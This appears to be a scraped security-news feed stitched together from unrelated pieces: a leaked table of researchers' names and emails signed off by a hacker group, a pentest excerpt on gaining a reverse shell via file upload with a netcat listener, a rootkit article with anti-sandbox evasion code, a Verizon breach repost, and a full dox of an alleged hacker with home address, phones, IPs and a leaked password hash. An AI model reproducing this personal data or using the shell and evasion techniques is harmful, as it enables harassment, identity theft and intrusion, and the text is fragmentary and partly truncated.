396,422,Tamas Nepusz,tamas@cs.rhul.ac.uk,2011-07-21
397,423,Jason Montojo,jrrmzz@gmail.com,2011-07-21
398,424,<blank>,metscape-help@umich.edu,2011-07-25
399,425,Keiichiro Ono,kono@ucsd.edu,2011-07-29
403,429,Keiichiro Ono,kono@ucsd.edu,2011-07-29
400,426,Keiichiro Ono,kono@ucsd.edu,2011-07-29
402,428,Keiichiro Ono,kono@ucsd.edu,2011-07-29
404,430,Keiichiro Ono,kono@ucsd.edu,2011-08-01
405,431,Mike Smoot,msmoot@ucsd.edu,2011-08-05
408,434,"John \\""Scooter\\"" Morris",scooter@cgl.ucsf.edu,2011-09-06
407,433,"John \\""Scooter\\"" Morris",scooter@cgl.ucsf.edu,2011-09-06
406,432,Gabriela Bindea,bernhard.mlecnik@crc.jussieu.fr,2011-08-31
409,435,"John \\""Scooter\\"" Morris",scooter@cgl.ucsf.edu,2011-09-06
411,437,Gerardo Huck,gerardohuck@gmail.com,2011-09-13
412,438,Allan Kuchinsky,allan_kuchinsky@agilent.com,2011-09-14
414,440,Nicolas Alcaraz,nalcaraz@mpi-inf.mpg.de,2011-09-17
415,441,Giovanni Scardoni,giovanni.scardoni@gmail.com,2011-09-19
416,442,<blank>,metscape-help@umich.edu,2011-10-03
417,443,<blank>,metscape-help@umich.edu,2011-10-05
419,445,Nicolas Alcaraz,nalcaraz@mpi-inf.mpg.de,2011-10-12
421,447,"John \\""Scooter\\"" Morris",scooter@cgl.ucsf.edu,2011-10-23
418,444,Ian Donaldson,i.m.donaldson@biotek.uio.no,2011-10-10
422,448,Matt DeJongh,dejongh@hope.edu,2011-10-24
420,446,Aleksandar Stojmirovic,stojmira@ncbi.nlm.nih.gov,2011-10-22
423,449,Tamas Nepusz,tamas@cs.rhul.ac.uk,2011-10-25
424,450,Matt DeJongh,dejongh@hope.edu,2011-10-27
426,452,Jianjiong Gao,jgao@cbio.mskcc.org,2011-11-02
427,453,Jan Bot,j.j.bot@tudelft.nl,2011-11-08
428,454,Jianjiong Gao,jgao@cbio.mskcc.org,2011-11-08
429,455,Christopher Whelan,whelanch@ohsu.edu,2011-11-14
430,456,Chao Zhang,czhmu2010@gmail.com,2011-11-15
431,457,Paul Boddie,paul.boddie@biotek.uio.no,2011-11-21
432,458,Aleksandar Stojmirovic,stojmira@ncbi.nlm.nih.gov,2011-11-30
433,459,Chia-Hao Chin,jovice.king@gmail.com,2011-12-06
435,461,Jason Montojo,jrrmzz@gmail.com,2011-12-20
434,460,Aleksandar Stojmirovic,stojmira@ncbi.nlm.nih.gov,2011-12-16
436,462,Giovanni Scardoni,giovanni.scardoni@gmail.com,2011-12-28
438,464,Tobias Koetter,tobias.koetter@uni-konstanz.de,2012-01-09
439,465,Thomas Kelder,thomaskelder@gmail.com,2012-01-13
440,466,Martina Kutmon,mkutmon@gmail.com,2012-01-26
442,468,Tim te Beek,tim.te.beek@nbic.nl,2012-02-02
443,469,Jason Montojo,jrrmzz@gmail.com,2012-02-03
441,467,Joachim M\xc3\xbcller,joachim@mmci.uni-saarland.de,2012-02-04
444,470,Pietro Hiram Guzzi,hguzzi@unicz.it,2012-02-04
446,472,Mario Albrecht,mario.albrecht@mpi-inf.mpg.de,2012-02-20
447,473,Oleg Ursu,oursu@salud.unm.edu,2012-02-27
450,476,Ronggui Yi,ronggui.yi@gmail.com,2012-03-10
448,474,Isaac,isaac.lera@uib.es,2012-02-28
449,475,Sergio E. Baranzini,sebaran@cgl.ucsf.edu,2012-02-29
451,477,Ronggui Yi,ronggui.yi@gmail.com,2012-03-10
452,478,Keiichiro Ono,kono@ucsd.edu,2012-03-15
454,480,Oleg Ursu,oursu@salud.unm.edu,2012-03-23
455,481,Qi Wang,qwang.big@gmail.com,2012-03-25
453,479,Aleksandar Stojmirovic,stojmira@ncbi.nlm.nih.gov,2012-03-16
456,482,Jan Bot,j.j.bot@tudelft.nl,2012-03-27
458,484,Kozo Nishida,kozo-ni@is.naist.jp,2012-04-11
457,483,Matthias K\xc3\xb6nig,matthias.koenig@charite.de,2012-04-01
460,486,Chia-Hao Chin,jovice.king@gmail.com,2012-04-24
459,485,Mike Smoot,msmoot@ucsd.edu,2012-04-24
461,487,Eric Bonnet,eric.bonnet@curie.fr,2012-04-26
462,488,Emanuel Goncalves,emanuel@ebi.ac.uk,2012-05-03
463,489,Emanuel Goncalves,emanuel@ebi.ac.uk,2012-05-03
464,490,Jason Montojo,jrrmzz@gmail.com,2012-05-11
465,491,Ali Masoudi-Nejad,amasoudin@ibb.ut.ac.ir,2012-05-23
466,492,Keiichiro Ono,kono@ucsd.edu,2012-06-01
467,493,Duc-Hau Le,hauldhut@gmail.com,2012-06-13
468,494,Duc-Hau Le,hauldhut@gmail.com,2012-06-14
469,495,Matthias Koenig,matthias.koenig@charite.de,2012-06-14
470,496,Mate Szalay-Beko,szalay.beko.mate@gmail.com,2012-06-24
472,498,Tim te Beek,tim.te.beek@nbic.nl,2012-07-06
474,500,Tim te Beek,tim.te.beek@nbic.nl,2012-07-07
473,499,Gregor Warsow,gregor.warsow@uni-rostock.de,2012-07-06
475,501,Tim te Beek,tim.te.beek@nbic.nl,2012-07-07
476,502,Ali Masoudi-Nejad,amasoudin@ibb.ut.ac.ir,2012-07-10
477,503,Gregor Warsow,gregor.warsow@uni-rostock.de,2012-07-11
478,504,Michael Heuer,heuermh@acm.org,2012-07-12
479,505,<blank>,metscape-help@umich.edu,2012-07-16
480,506,Subhankar Mukherjee,subho.m@samsung.com,2012-07-23
482,508,Mike Smoot,msmoot@ucsd.edu,2012-07-31
481,507,Gregor Warsow,gregor.warsow@uni-rostock.de,2012-07-24
483,509,Mike Smoot,msmoot@ucsd.edu,2012-07-31
484,510,Mike Smoot,msmoot@ucsd.edu,2012-07-31
485,511,Mike Smoot,msmoot@ucsd.edu,2012-07-31
486,512,Martina Kutmon,mkutmon@gmail.com,2012-08-08
487,513,Eric Bonnet,eric.bonnet@curie.fr,2012-09-04
489,515,Robert Pesch,robert.pesch@bio.ifi.lmu.de,2012-09-15
488,514,Emanuel Goncalves,emanuelvgoncalves@gmail.com,2012-09-07
491,517,Tim te Beek,tim.te.beek@nbic.nl,2012-10-02
492,518,Tim te Beek,tim.te.beek@nbic.nl,2012-10-02
493,519,Esther Camilo,esther@ibb.unesp.br,2012-10-03
495,521,Emanuel Goncalves,emanuel@ebi.ac.uk,2012-10-09
496,522,Emanuel Gon\xc3\xa7alves,emanuel@ebi.ac.uk,2012-10-10
497,523,Jason Montojo,jrrmzz@gmail.com,2012-10-10
502,528,Jason Montojo,jrrmzz@gmail.com,2012-10-17
501,527,Keiichiro Ono,kono@ucsd.edu,2012-10-16
500,526,Keiichiro Ono,kono@ucsd.edu,2012-10-16
498,524,Gabriela Bindea,gabriela.bindea@crc.jussieu.fr,2012-10-11
499,525,"Gabriela Bindea, Bernhard Mlecnik",bernhard.mlecnik@crc.jussieu.fr,2012-10-11
505,531,Alex Ade,asade@umich.edu,2012-11-05
507,533,Jason Montojo,jrrmzz@gmail.com,2012-11-09
506,532,Emanuel Goncalves,emanuel@ebi.ac.uk,2012-11-07
504,530,Marco Antoniotti,marco.antoniotti@unimib.it,2012-11-01
508,534,Emanuel Goncalves,emanuel@ebi.ac.uk,2012-11-26
512,538,Tim te Beek,tim.te.beek@nbic.nl,2012-12-04
511,537,Tim te Beek,tim.te.beek@nbic.nl,2012-12-03
509,535,Gabriela Bindea,gabriela.bindea@crc.jussieu.fr,2012-11-29
510,536,"Gabriela Bindea, Bernhard Mlecnik",bernhard.mlecnik@crc.jussieu.fr,2012-11-29
513,539,Simone Zorzan,simone.zorzan@univr.it,2012-12-10
516,542,Eric Bonnet,eric.bonnet@curie.fr,2012-12-21
514,540,"Gabriela Bindea, Bernhard Mlecnik",gabriela.bindea@crc.jussieu.fr,2012-12-1
==========================================================================================
Enjoy the leak, and remember.. We wreck shit, because we can.

Sincerly,

   _  _    ____ ____          
 _| || |_ / ___/ ___|  ___  ___
|_  ..  _| |  _\___ \ / _ \/ __|
|_      _| |_| |___) |  __/ (__
  |_||_|  \____|____/ \___|\___|
@Gsec_




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

File Upload Exploitation

$
0
0

File upload vulnerabilities consists a major threat for web applications.A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell.Of course shell is always a goal but a good penetration tester must not stop there.Further activities can be performed after the shell.The focus of these activities must be on the database.In this article we will see how we can obtain a shell from the exploitation of file upload on a Linux web server and how we can dump the database that is running on the system.
Backtrack includes a variety of web shells for different technologies like PHP,ASP etc.In our example we will use the damn vulnerable web application which is written in PHP in order to attack the web server through the file upload.The web shell that we will use in our case it will be the php-reverse-shell.
uploading the web shell
uploading the web shell

Now we have to set our machine to listen on the same port as our web shell.We can do this with netcat and the command nc -lvp 4444.The next step is to go back to the web application and to try to access the URL that the PHP reverse shell exists.We will notice that it will return a shell to our console
Read more......http://pentestlab.wordpress.com/2012/12/23/file-upload-exploitation/?goback=%2Egmp_970937%2Egde_970937_member_198615424

Rotten to the core…A Roundup on Rootkits

$
0
0

Rootkit is a common word in Computer Security. A word often spoken to describe a bad, vary bad type of malware.
A rootkit is a program that can be installed and hidden on a computer without the knowledge of its user. It can be included in a larger software package, or installed by successfully exploit vulnerabilities or by convincing the victim to execute it by a phishing email.
Generally, books and magazines talk about rootkits, but do not go deep in the description them. The argument is quite complex and requires a dose of programming skills to be completely understood.
Our intention is to approach the matter in a “friendly way” in order to offer a vision of the whole picture even to a reader without programming knowledge… So keep your seatbelt fastened, we are flying to the rootkit land.
Rootkit Evolution
Rootkits became known to the world at the end of the last century. The purpose of the rootkit, at time, was to conceal additional programs that would allow an attacker to "sniff" or spy on the traffic to and from a computer.
They earned the name “rootkits” because they were mainly used on Unix derived computer systems where the top-level administrative account is called “root”. Thus to “root” a system is to obtain top-level administrative privileges and hence obtain full control of the system.
Later, however, this kind of tools has grown in sophistication, changing its targets. 
Windows users have become the primary targets, and the Rootkits have escalated the cybercriminal world.
Today rootkits have improved immensely to the point that many of them are now much difficult to detect. Some are now "all-in-one" malware with a large number of features. Additionally, many current rootkits have the ability to capture sensitive information and to help cybercriminals create and manage gigantic botnets.
These botnets can then be used in a variety of ways, including spam forwarding and extortion. In the evolution, rootkits functionality, infection strategies and persistence mechanisms have changed greatly. However, the core purpose remains to assume full control of the machine by downloading additional malware.
Rootkits, today, appear as very flexible malware. This flexibility is evident by looking at the features they have inherited by other classes of malware, such as Loggers, Trojans and Stealers.
Traditionally rootkits were not necessarily malicious per se; they hid other illegal activities, but were limited in their deployment by the adoption of a multistage infection: first rootkit, then the Trojan or the Keylogger.
Today, instead, attacker may be able to access information, monitor actions, modify programs, or inject other types of malware through the Rootkit.
In some circumstances, rootkits today can be mistaken for Trojan Horses. Technically rootkits are not Trojans but their level of functionality is now equal (or better), and when an attacker has no special needs, rootkits can be used for the same purpose.
The latest rootkits are now capable to subvert the memory of other applications running on the system, presenting the applications with a false view of the underlying system. This would effectively hide the rootkit from any antivirus scanning software.
To combat these threats, defenders have turned to the collection, analysis, and reverse engineering of malware as mechanisms to understand these programs, generate signatures, and facilitate cleanup of infected hosts.
Unfortunately, malware developers are perfectly informed about how a malware analyst works, what kind of tools he uses and which techniques are normally applied to check the system looking for malware.
During the times, malware writers have developed several techniques to divert and to avoid analysis of their “creatures” by the good-guys.
One of these techniques is the use of the so-called “antis”, a slang term to indicate a series of pieces of code used to detect and then evade the tools used by malware analysts, for example:
  • Anti-Sandbox
  • Anti-virtualization
  • Anti-antivirus  
In the code snippet below (Snippet 1) we leave an example of an “antis”.
For these reasons, the analysis, in presence of a rootkit, should be performed in cycles trying to avoid false patterns or false discriminatory elements.
 
' anti sandboxie / cw sandox / vmware by t0fx
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Function WindowsDirectory() As String  'get windows path
Dim Buff As String * 255
WindowsDirectory = Left$(Buff, GetWindowsDirectory(Buff, Len(Buff) + 1))
End Function
Private Function SystemDrive() As String 'get system drive letter
SystemDrive = Left$(WindowsDirectory(), 1)
End Function
Private Sub Form_Load()
If App.Path & App.EXEName & ".exe" = SystemDrive & ":\sample.exe" Then
        MsgBox "Caused exception at 0x44e85c", vbCritical, "CW sandbox"
    End
        Else
            End If
If fuckingprocesses("SandboxieRpcSs.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "Sandboxie"
  End
Else
        End If
If fuckingprocesses("SandboxieDcomLaunch.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "Sandboxie"
  End
    Else
        End If
If fuckingprocesses("VMwareTray.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "VMware"
  End
Else
        End If
If fuckingprocesses("VMwareService.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "VMware"
  End
Else
        End If
If fuckingprocesses("VMwareUser.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "VMware"
  End
    Else
        End If
End Sub

 
Snippet 1 – Example of “antis”
 
Rootkits Internals
The strength of rootkits is the ability to hide itself. In fact, it can become invisible to the user, application programs and the entire Operating System without losing its abilities.

read more..........http://www.chmag.in/article/dec2012/rotten-core%E2%80%A6a-roundup-rootkits

A hacker said he has acquired more than 3 million Verizon customer records -- but leaks only 10 percent of them, after the phone and broadband giant fails to fix a security flaw. Verizon disagrees. (please contact this blog if you feel your data was compromised and you can be notified in order to mitigate the chance of people garnering your info for nefarious purposes as I have the DOX)

$
0
0
Either way if you are a Verizon customer do not wait to contact the company but rather be proactive in calling them so you can know that your data is safe. However if you were effected please be sure to monitor all your sensitive information to see if any anomalies are prevalent in any or your critical information. Again, if you feel your data was compromised you can contact me to see if this was the case in order to mitigate the chance of people garnering your info for nefarious purposes as I have the DOX  

Now for the article.....


Updated on December 22 at 8:00 p.m. ET: Verizon spokesperson Alberto Canal told ZDNet in an emailed statement: "We have examined the posted data and we have confirmed that it is not Verizon Wireless customer data. Our systems have not been hacked."

The hacker said in a later tweet the data likely belongs to Verizon FiOS fiber customers, rather than Verizon Wireless cellular customers. We've updated the post to reflect these changes. We've put in more questions to Verizon and will update again once we hear back.

- - -

A hacker has posted around 300,000 database entries of Verizon customers to the Web, after exploiting a vulnerability in the cellular giant's network.

This file is still floating around the Internet so for those who use Verizon please contact the company and make sure that you have not been compromised and do whatever necessary to mitigate the chance of people garnering your info for nefarious purposes. I have access to the names that were obtained due to the breach or so called breach so if you feel you have been compromised contact me and I will let you know if your name is on the DOX. Article below.



The hacker, going by the name @TibitXimer on Twitter, told ZDNet earlier this evening that the hack was carried out earlier this year on July 12, which allowed him to gain root access to the server holding the customer data. Tibit gained access to a server with little difficulty after working with another hacker to identify the security flaw.

Read this


2012: Looking back at the major hacks, leaks and data breaches

Read more
Tibit downloaded more than 3 million customer entries from Verizon's database, including names, addresses, mobile serial numbers, the opening date of each account, and account passwords. However, he said that figure was an estimate and had "no clue" exactly how many records there were, and that it was a "low estimate based on the size of one record and the size of all the files."

A fraction of the downloaded data has been published to code-sharing site Pastebin after Verizon failed to fix the vulnerability in its network, Tibit said, noting that the data was stored in plain text and did not require decryption.

(Update on December 23 at 8:10 a.m. ET: The Pastebin link no longer works, though the cache of data remains in wide circulation around the Web.)

The hacker said that after he informed Verizon of the exploit, the company "ignored my report," and did not comment.


read more..........http://www.zdnet.com/hacker-verizon-duel-over-customer-record-claims-7000009151/

TibitXimer DOX of alleged Verizon Attacker responsible for Saturday's Exploit (Inclusive song dedication regarding this and It also goes out to someone whom I dearly love and always will. She knows who she is:))

$
0
0
Those who seek to exploit innocent people, in particular through the latest Verizon breach will eventually be caught. Its one thing to be an Hacktivist  but quite another to leak information about innocent people for one's personal agenda's. One can get their word across without having to leak innocent individual data that could eventually be used for malicious intent. This is not to say there is not corruption among governmental agencies and entities around the globe but there is a better way to get ones message across without collateral damage. Why is it necessary to hurt those comprised of the general population by exploiting and doxing their critical data? Here a song dedication for those who have made mistakes and will hopefully learn from them. It also goes out to someone whom I dearly love and always will. Perfect for the new year. Focus on the chorus. http://www.youtube.com/watch?v=s1ysoohV_zA

TibitXimer dox :D

Name:                Dylan Scott Hailey
Aliases:             Tibit
                     Tibit147
                     TibitXimer
Date of Birth:       3/17/1988
Location:            175 Pebble Beach Dr
                     Little Rock, AR 72212-2646 US
Email:               tibit147@yahoo.com
Phone Numbers:       501-766-8716 (Mobile AT&T)
                     501-223-0748 (Home AT&T)
Liberty Reserve:     U5544244
Hack Forums:         http://www.hackforums.net/member.php?action=profile&uid=516470
Facebook:            https://www.facebook.com/tibit147
                     Dylan Hailey
                     Little Rock, AR
                     Little Rock Catholic High School
                     Knows English & German
Twitter:             http://twitter.com/TibitXimer
Pictures:            http://i.imgur.com/k3klN.jpg
                     http://www.anonmgur.com/up/6baa8833474db13f09ea0c4582572823.jpg
                     http://profile.ak.fbcdn.net/hprofile-ak-snc6/c0.23.180.180/190193_1011249166583_5353_a.jpg
Skype:               mickey_2846
IPs:                 68.51.40.138
                     67.167.158.129
Known Domains:       edbud.org
                     khaoticinteractive.net
                     we-se.com
                     hfempire.net
                     anonhacks.com
                     tibit.us

Old HackForums DB entry (Released by LulzSec):

        ,(651337, 'Tibit', '752742870a2b4bf2b1a986524ece7021', 'Uer1xNmb', 'vOkZJUrePmu1YAMvYxlfLcNZAQLqIyYLpdFooWHUPWKIat7Hh4', 'tibit147@yahoo.com', 111, 0, 0.00, 'images/avatars/bam.png?dateline=1297535359', '80|80', 'gallery', 9, 15, 15, 'BlackHat Hacker | HF L33T', 1295847783, 1298121535, 1298091109, 1298120317, NULL, 0, NULL, NULL, 'tibit147@yahoo.com', '17-3-1988', 'none', '[img]http://i.min.us/iefEa8.gif[/img]\r\n\r\n[color=#FF0000][b]Go to [url=http://www.hackforums.net/showthread.php?tid=1048271]here[/url] for cheap hacking eBooks on a wide variety of hacking subjects.[/b][/color]', '<img src=\"http://i.min.us/iefEa8.gif\" border=\"0\" alt=\"[Image: iefEa8.gif]\" /><br />\n<br />\n<span style=\"color: #FF0000;\"><span style=\"font-weight: bold;\">Go to <a href=\"http://www.hackforums.net/showthread.php?tid=1048271\" target=\"_blank\">here</a> for cheap hacking eBooks on a wide variety of hacking subjects.</span></span>', 1, 1, 0, 0, 1, 1, 1, 'linear', 1, 1, 1, 1, 0, 0, 0, NULL, NULL, -6, 0, 2, NULL, NULL, 0, 0, 0, 0, NULL, '1**$%%$2**$%%$3**$%%$4**$%%$5**Look into!$%%$6**ebooks$%%$7**Hacking Jobs$%%$8**Read', NULL, 0, 0, 6, '68.51.8.253', '68.51.8.253', 1144195325, 1144195325, 'english', 177502, 1, 233, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, NULL)


===============================================================================

CORPORATE BULLSHIT

"Dylan Hailey
 CEO/CFO at Khaotic Interactive LLC  Studied at Little Rock Catholic High School  Lives In Little Rock, Arkansas  From Little Rock, Arkansas
My name is Dylan and I recently graduated from Catholic High School, anything else you need to know just ask me. Twitter: @TibitXimer Klout: http://klout.com/#/TibitXimer
"

Source:http://beta.sumazi.com/show/introcard?icuid=1385621654&view=1
Mirror: http://freze.it/1hh

Yeah... About that...

Corporation Name KHAOTIC INTERACTIVE LLC
Fictitious Names
Filing # 811014398
Filing Type Limited Liability Company
Filed under Act Domestic LLC; 1003 of 1993
Status Good Standing
Principal Address
Reg. Agent DYLAN SCOTT HAILEY
Agent Address 175 PEBBLE BEACH DR

LITTLE ROCK, AR 72212
Date Filed 04/16/2012
Officers DYLAN SCOTT HAILEY , Incorporator/Organizer
Foreign Name N/A
Foreign Address
State of Origin N/A

Source: http://www.sos.arkansas.gov/corps/search_corps.php?DETAIL=385497&corp_type_id=7&corp_name=&agent_search=&agent_city=&agent_state=&filing_number=&cmd=

===============================================================================

WHOIS TIME


anonhacks.com

domain:                          anonhacks.com
created:                         17-Feb-2012
last-changed:                    08-Jun-2012
registration-expiration:         17-Feb-2013

nserver:                         ns51.1and1.com 217.160.80.164
nserver:                         ns52.1and1.com 217.160.81.164

status:                          CLIENT-TRANSFER-PROHIBITED

registrant-firstname:            Dylan
registrant-lastname:             Hailey
registrant-organization:         We-Se.com
registrant-street1:              175 Pebble Beach Dr
registrant-pcode:                72212
registrant-state:                AR
registrant-city:                 Little Rock
registrant-ccode:                US
registrant-phone:                +1.5017668716
registrant-email:                tibit147@yahoo.com

admin-c-firstname:               Dylan
admin-c-lastname:                Hailey
admin-c-organization:            We-Se.com
admin-c-street1:                 175 Pebble Beach Dr
admin-c-pcode:                   72212
admin-c-state:                   AR
admin-c-city:                    Little Rock
admin-c-ccode:                   US
admin-c-phone:                   +1.5017668716
admin-c-email:                   tibit147@yahoo.com

tech-c-firstname:                Hostmaster
tech-c-lastname:                 ONEANDONE
tech-c-organization:             1&1 Internet Inc.
tech-c-street1:                  701 Lee Rd.
tech-c-street2:                  Suite 300
tech-c-pcode:                    19087
tech-c-state:                    PA
tech-c-city:                     Chesterbrook
tech-c-ccode:                    US
tech-c-phone:                    +1.8774612631
tech-c-fax:                      +1.6105601501
tech-c-email:                    hostmaster@1and1.com

bill-c-firstname:                Hostmaster
bill-c-lastname:                 ONEANDONE
bill-c-organization:             1&1 Internet Inc.
bill-c-street1:                  701 Lee Rd.
bill-c-street2:                  Suite 300
bill-c-pcode:                    19087
bill-c-state:                    PA
bill-c-city:                     Chesterbrook
bill-c-ccode:                    US
bill-c-phone:                    +1.8774612631
bill-c-fax:                      +1.6105601501
bill-c-email:                    hostmaster@1and1.com


-------------------------------------------------------------------------------

edbud.org

Domain ID:D165667880-LROR
Domain Name:EDBUD.ORG
Created On:27-May-2012 15:25:48 UTC
Last Updated On:27-Jul-2012 03:50:26 UTC
Expiration Date:27-May-2013 15:25:48 UTC
Sponsoring Registrar:Tucows Inc. (R11-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:tuhSNQr4mmJhCg7t
Registrant Name:Dylan Hailey
Registrant Organization:Khaotic Interactive LLC
Registrant Street1:175 Pebble Beach Dr
Registrant Street2:
Registrant Street3:
Registrant City:Little Rock
Registrant State/Province:Arkansas
Registrant Postal Code:72212
Registrant Country:US
Registrant Phone:+1.5017668716
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:tibit@khaoticinteractive.com
Admin ID:tu1xaRgofagdOLk6
Admin Name:Dylan Hailey
Admin Organization:Khaotic Interactive LLC
Admin Street1:175 Pebble Beach Dr
Admin Street2:
Admin Street3:
Admin City:Little Rock
Admin State/Province:Arkansas
Admin Postal Code:72212
Admin Country:US
Admin Phone:+1.5017668716
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:tibit@khaoticinteractive.com
Tech ID:tuudr9MaMmTLfrEJ
Tech Name:Dylan Hailey
Tech Organization:Khaotic Interactive LLC
Tech Street1:175 Pebble Beach Dr
Tech Street2:
Tech Street3:
Tech City:Little Rock
Tech State/Province:Arkansas
Tech Postal Code:72212
Tech Country:US
Tech Phone:+1.5017668716
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:tibit@khaoticinteractive.com
Name Server:NS2246.DIZINC.COM
Name Server:NS2247.DIZINC.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned

-------------------------------------------------------------------------------

hfempire.net

Registrant
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
14747 N Northsight Blvd Suite 111, PMB 309
Scottsdale, Arizona 85260
United States
hfempire.net@domainsbyproxy.com
Administrative Contact
Registration Private
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
14747 N Northsight Blvd Suite 111, PMB 309
Scottsdale, Arizona 85260
United States
hfempire.net@domainsbyproxy.com
Technical Contact
Registration Private
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
14747 N Northsight Blvd Suite 111, PMB 309
Scottsdale, Arizona 85260
United States
hfempire.net@domainsbyproxy.com
Registered Through
GoDaddy.com, LLC
Domain Name: hfempire.net
Created on: 9/30/2012 12:44:17 AM
Expires on: 9/30/2013 12:44:17 AM
Last Updated on: 9/30/2012 12:58:32 AM
Domain Servers
ERIN.NS.CLOUDFLARE.COMJAY.NS.CLOUDFLARE.COM

-------------------------------------------------------------------------------

khaoticinteractive.com

Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: KHAOTICINTERACTIVE.COM
Created on: 08-Jan-12
Expires on: 08-Jan-13
Last Updated on: 13-May-12

Registrant:
Domains By Proxy, LLC

DomainsByProxy.com
14747 N Northsight Blvd Suite 111, PMB 309
Scottsdale, Arizona 85260
United States

Administrative Contact:
Private, Registration KHAOTICINTERACTIVE.COM@domainsbyproxy.com
Domains By Proxy, LLC
DomainsByProxy.com
14747 N Northsight Blvd Suite 111, PMB 309
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2598

Technical Contact:
Private, Registration KHAOTICINTERACTIVE.COM@domainsbyproxy.com
Domains By Proxy, LLC
DomainsByProxy.com
14747 N Northsight Blvd Suite 111, PMB 309
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2598

Domain servers in listed order:
NS05.DOMAINCONTROL.COM
NS06.DOMAINCONTROL.COM


Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited


Source: http://who.godaddy.com/whois.aspx?domain=khaoticinteractive.com&prog_id=GoDaddy
Mirror: http://freze.it/1hg

-------------------------------------------------------------------------------

tibit.us

Domain Name:                                 TIBIT.US
Domain ID:                                   D34698892-US
Sponsoring Registrar:                        GODADDY.COM, INC.
Sponsoring Registrar IANA ID:                146
Registrar URL (registration services):       whois.godaddy.com
Domain Status:                               clientDeleteProhibited
Domain Status:                               clientRenewProhibited
Domain Status:                               clientTransferProhibited
Domain Status:                               clientUpdateProhibited
Registrant ID:                               CR100606805
Registrant Name:                             Dylan Hailey
Registrant Organization:                     Tibit Coding
Registrant Address1:                         175 Pebble Beach Dr
Registrant City:                             Little Rock
Registrant State/Province:                   Arkansas
Registrant Postal Code:                      72212
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.5017668716
Registrant Email:                            tibit147@yahoo.com
Registrant Application Purpose:              P4
Registrant Nexus Category:                   C21
Administrative Contact ID:                   CR100606807
Administrative Contact Name:                 Dylan Hailey
Administrative Contact Organization:         Tibit Coding
Administrative Contact Address1:             175 Pebble Beach Dr
Administrative Contact City:                 Little Rock
Administrative Contact State/Province:       Arkansas
Administrative Contact Postal Code:          72212
Administrative Contact Country:              United States
Administrative Contact Country Code:         US
Administrative Contact Phone Number:         +1.5017668716
Administrative Contact Email:                tibit147@yahoo.com
Administrative Application Purpose:          P4
Administrative Nexus Category:               C21
Billing Contact ID:                          CR100606808
Billing Contact Name:                        Dylan Hailey
Billing Contact Organization:                Tibit Coding
Billing Contact Address1:                    175 Pebble Beach Dr
Billing Contact City:                        Little Rock
Billing Contact State/Province:              Arkansas
Billing Contact Postal Code:                 72212
Billing Contact Country:                     United States
Billing Contact Country Code:                US
Billing Contact Phone Number:                +1.5017668716
Billing Contact Email:                       tibit147@yahoo.com
Billing Application Purpose:                 P4
Billing Nexus Category:                      C21
Technical Contact ID:                        CR100606806
Technical Contact Name:                      Dylan Hailey
Technical Contact Organization:              Tibit Coding
Technical Contact Address1:                  175 Pebble Beach Dr
Technical Contact City:                      Little Rock
Technical Contact State/Province:            Arkansas
Technical Contact Postal Code:               72212
Technical Contact Country:                   United States
Technical Contact Country Code:              US
Technical Contact Phone Number:              +1.5017668716
Technical Contact Email:                     tibit147@yahoo.com
Technical Application Purpose:               P4
Technical Nexus Category:                    C21
Name Server:                                 NS65.DOMAINCONTROL.COM
Name Server:                                 NS66.DOMAINCONTROL.COM
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Fri Dec 16 00:53:21 GMT 2011
Domain Expiration Date:                      Sat Dec 15 23:59:59 GMT 2012
Domain Last Updated Date:                    Fri Dec 16 00:53:21 GMT 2011

-------------------------------------------------------------------------------

we-se.com

Registrant:
      we-se.com
      Dylan Hailey
      175 Pebble Beach Dr
      Little Rock, AR 72212
      US
      Phone: +1.5017668716
      Email: Email Masking Image@yahoo.com



   Registrar Name....: Register.com
   Registrar Whois...: whois.register.com
   Registrar Homepage: www.register.com

   Domain Name: we-se.com
      Created on..............: 2011-11-10
      Expires on..............: 2013-11-10

   Administrative Contact:
      we-se.com
      Dylan Hailey
      175 Pebble Beach Dr
      Little Rock, AR 72212
      US
      Phone: +1.5017668716
      Email: Email Masking Image@yahoo.com


   Technical  Contact:
      Registercom
      Domain Registrar
      12808 Gran Bay Pkwy
      West Jacksonville, FL 32258
      US
      Phone: +1.9027492701
      Email: Email Masking Image@register.com


   DNS Servers:
      ns1.expireddomains.register.com
      ns2.expireddomains.register.com

Information Updated: Thu, 22 Nov 2012 11:00:57 UTC





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


[ MDVSA-2012:182 ] apache-mod_security

$
0
0

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

